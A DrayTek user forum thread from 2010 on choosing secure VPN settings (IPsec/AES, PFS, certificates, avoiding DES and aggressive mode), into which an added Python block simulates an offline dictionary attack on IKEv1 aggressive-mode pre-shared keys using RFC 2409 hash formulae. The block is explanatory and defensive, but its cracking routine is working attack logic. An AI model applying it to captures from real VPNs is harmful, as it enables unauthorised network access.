DrayTek UK Users' Community Forum

Help, Advice and Solutions from DrayTek Users

Most Secure VPN method

03 Apr 2010 18:58 #1 by ukcolin002
Most Secure VPN method was created by ukcolin002
What is the most secure way of setting up a VPN connection?
IPsec/DES, SSL, one-time password.

I require total security, encryption, login etc.

Any advice, thanks.


03 Apr 2010 19:46 #2 by njh
Replied by njh on topic Most Secure VPN method
There is no such thing as total security.

Go for IPSec with Perfect Forward Secrecy (PFS), ESP Security Method with AES and Authentication. If your router supports it (e.g. the 2950) use certificates rather than a pre-shared key (PSK). If you use a PSK use a strong one (long, random, mixed case with numbers and special characters).

Keep a mile clear of DES (apparently it can be cracked within a couple of days). 3DES is OK, AES is probably better.

I don't know much about SSL, but I would expect it to be fine with certificates.

Ultimately even stronger non-Draytek solutions are available. You can build your own Linux box and use Openswan for stronger encryption algorithms and there are a number of proprietary boxes which can also do the trick. TBH, you should be OK with the settings I gave you above on a Draytek.

2900Gi/v2.5.6; 2900/v2.5.6


04 Apr 2010 17:06 #3 by ukcolin002
Replied by ukcolin002 on topic VPN Security
Thanks.
Looked at SSL but the password side seemed thin compared to IPsec/AES, and you cannot see the file structure unless you use Samba.

The one-time password works, but removes the IPsec during setup? Going to contact DrayTek as to why.

Looked at certs but could not get the 2955 to work with an imported cert. DrayTek are unsure why.

05 Apr 2010 22:12 #4 by mars mug
Replied by mars mug on topic Most Secure VPN method

NJH wrote: Keep a mile clear of DES (apparently it can be cracked within a couple of days).

Wouldn’t the repeated failed attempts be noticed?

05 Apr 2010 22:28 #5 by njh
Replied by njh on topic Most Secure VPN method
Noticed by what? Unless you are specifically monitoring for it in syslog? The Draytek will not raise the alarm in any other way. Also I don't know the crack mechanism. If it is sniffing passing traffic and then analysing it off line to work out the PSK, the first connection attempt it makes will be with the correct PSK.

Also keep clear of aggressive mode. This can be cracked, but again I've no idea how.

2900Gi/v2.5.6; 2900/v2.5.6

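njh's advice to use a long, random PSK (post #2) and to keep clear of aggressive mode (post #5), together with mars mug's question about whether failed attempts would be noticed, all meet in one well-known weakness of IKEv1: in aggressive mode with pre-shared-key authentication, the responder's HASH_R is sent before any encryption exists, and every other input to it (nonces, DH public values, cookies, SA proposal, responder ID) is visible on the wire, so a passive sniffer can test candidate PSKs offline without ever contacting the router. The Python below is an added example written for this page, not code from the thread or from DrayTek. It simulates that exchange using the SKEYID and HASH_R formulae of RFC 2409, assumes HMAC-SHA1 as the prf, and uses constructed placeholder bytes for the nonces, DH values, cookies and payload bodies; the wordlist and the PSK alphabet are assumptions too.

```python
"""
Added example, not code from the forum thread or from DrayTek: a simulation of
the IKEv1 aggressive-mode PSK weakness. The formulae for SKEYID and HASH_R are
those of RFC 2409 (PSK authentication); the prf is assumed to be HMAC-SHA1 and
every protocol value is constructed locally, so nothing here touches a router.
"""
import hashlib
import hmac
import math
import secrets
import string
from typing import Optional

# Constructed wordlist standing in for the dictionaries real crackers use.
WORDLIST = ["password", "vpn", "draytek", "admin", "draytek123", "letmein", "Vigor2950"]

# Characters used for a generated PSK. Assumption: the router's web UI accepts
# all ASCII punctuation; trim PSK_ALPHABET if yours does not.
PSK_ALPHABET = string.ascii_letters + string.digits + string.punctuation


def prf(key: bytes, data: bytes) -> bytes:
    """IKEv1 prf, assumed here to be HMAC-SHA1 (the hash negotiated in the SA)."""
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, ni: bytes, nr: bytes) -> bytes:
    """RFC 2409, pre-shared keys: SKEYID = prf(PSK, Ni_b | Nr_b)."""
    return prf(psk, ni + nr)


def hash_r(psk: bytes, capture: dict) -> bytes:
    """RFC 2409: HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b).
    Every input except the PSK is visible on the wire in aggressive mode."""
    skeyid = skeyid_psk(psk, capture["ni"], capture["nr"])
    return prf(skeyid, capture["g_xr"] + capture["g_xi"] + capture["cky_r"]
               + capture["cky_i"] + capture["sai_b"] + capture["idir_b"])


def aggressive_mode_capture(psk: bytes) -> dict:
    """What a passive sniffer records from messages 1 and 2 of an aggressive-mode
    exchange. Random bytes stand in for nonces, DH public values and cookies
    (constructed placeholders, not a real packet capture)."""
    capture = {
        "ni": secrets.token_bytes(20),        # initiator nonce
        "nr": secrets.token_bytes(20),        # responder nonce
        "g_xi": secrets.token_bytes(128),     # initiator DH public value (group 2 size)
        "g_xr": secrets.token_bytes(128),     # responder DH public value
        "cky_i": secrets.token_bytes(8),      # initiator cookie
        "cky_r": secrets.token_bytes(8),      # responder cookie
        "sai_b": b"AES-128/HMAC-SHA1/DH2",    # constructed stand-in for the SA proposal body
        "idir_b": b"\x02\x00\x00\x00vpn.example.test",  # constructed ID_FQDN payload body
    }
    # Message 2 carries HASH_R in the clear: no session key exists yet to encrypt it.
    capture["hash_r"] = hash_r(psk, capture)
    return capture


def crack_psk(capture: dict, wordlist) -> Optional[str]:
    """Offline dictionary attack against the captured HASH_R. No packet is sent to
    the router, so its syslog never sees a failed attempt; the first live
    connection the attacker makes already uses the recovered, correct PSK."""
    for candidate in wordlist:
        if hmac.compare_digest(hash_r(candidate.encode(), capture), capture["hash_r"]):
            return candidate
    return None


def strong_psk(length: int = 32) -> str:
    """Long, random PSK with mixed case, digits and punctuation, as njh advises."""
    while True:
        psk = "".join(secrets.choice(PSK_ALPHABET) for _ in range(length))
        if (any(c.islower() for c in psk) and any(c.isupper() for c in psk)
                and any(c.isdigit() for c in psk) and any(c in string.punctuation for c in psk)):
            return psk


def psk_entropy_bits(length: int, alphabet_size: int = len(PSK_ALPHABET)) -> float:
    """Work factor of a brute-force (not dictionary) search over the PSK, in bits."""
    return length * math.log2(alphabet_size)


if __name__ == "__main__":
    weak = aggressive_mode_capture(b"draytek123")
    print("weak PSK recovered offline:", crack_psk(weak, WORDLIST))
    strong = strong_psk()
    print("strong PSK recovered offline:",
          crack_psk(aggressive_mode_capture(strong.encode()), WORDLIST))
    print(f"brute-force work for a {len(strong)}-char PSK: ~{psk_entropy_bits(len(strong)):.0f} bits")
```

Run it directly to watch the weak PSK fall to the wordlist while a generated 32-character PSK does not. The attack is entirely passive, which answers the "wouldn't it be noticed" question: nothing reaches the router until the attacker already has the right key. Main mode does not expose this hash (it is sent under the Phase 1 encryption established after the DH exchange), and with certificate authentication RFC 2409 derives SKEYID from the DH shared secret rather than from a PSK, so the PSK is not in the hash at all; that is why certificates, then a strong PSK in main mode, then anything in aggressive mode is the right ordering. Tools such as ike-scan's psk-crack perform exactly this computation against real captures.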
06 Apr 2010 09:41 #6 by peter-h
Replied by peter-h on topic Most Secure VPN method
The best published attacks on DES still involve of the order of 2^40 keys to be tested.

This makes sense only with a known-plaintext attack, and even then only purpose built hardware will do it on any kind of meaningful timescale. With a PC - no way.

Also, most DES implementations use a session key, so the key is different anyway next time around...
